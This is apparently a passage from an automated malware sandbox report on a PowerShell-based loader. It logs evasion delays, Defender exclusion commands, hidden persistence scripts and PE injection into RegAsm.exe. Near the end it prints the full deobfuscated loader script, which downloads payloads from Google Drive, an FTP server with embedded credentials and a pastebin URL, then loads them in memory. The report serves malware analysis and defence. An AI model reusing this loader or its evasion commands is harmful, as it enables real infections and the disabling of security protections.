Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8264	Thread sleep count: 872 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8280	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356	Thread sleep count: 6741 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8480	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356	Thread sleep count: 253 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8480	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8440	Thread sleep count: 7990 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8508	Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8444	Thread sleep count: 121 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8464	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8496	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8580	Thread sleep count: 6859 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8616	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8584	Thread sleep count: 74 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8616	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796	Thread sleep count: 590 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8764	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8816	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8876	Thread sleep count: 5624 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8988	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8952	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8960	Thread sleep count: 5389 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8996	Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8996	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 9028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096	Thread sleep count: 8366 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9128	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9128	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3588	Thread sleep count: 4233 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5272	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064	Thread sleep count: 210 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8636	Thread sleep count: 1111 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680	Thread sleep count: 7536 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8656	Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8656	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8756	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2492	Thread sleep count: 9807 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620	Thread sleep count: 37 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8812	Thread sleep count: 9147 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012	Thread sleep count: 37 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8496	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\catroot2	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\System32\AppxSip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\e9e64b91c0e4559f01e50ac43ffb9a2a\System.DirectoryServices.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SYSTEM32\OpcServices.DLL	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\System32\wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\	Jump to behavior

Source: powershell.exe, 00000014.00000002.2433630418.0000020EE6348000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: powershell.exe, 00000035.00000002.3345971531.000001D34AFA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 0000001C.00000002.2824594158.000001E6F71DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3037917292.000001DE5562F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.3208980675.000001559E3A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Uses powershell cmdlets to delay payload execution

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: amsi64_5764.amsi.csv, type: OTHER

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"

Encrypted powershell cmdline option found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded Q1\|~y$T 7eMS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded Q1\|~y$T 7eMS			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
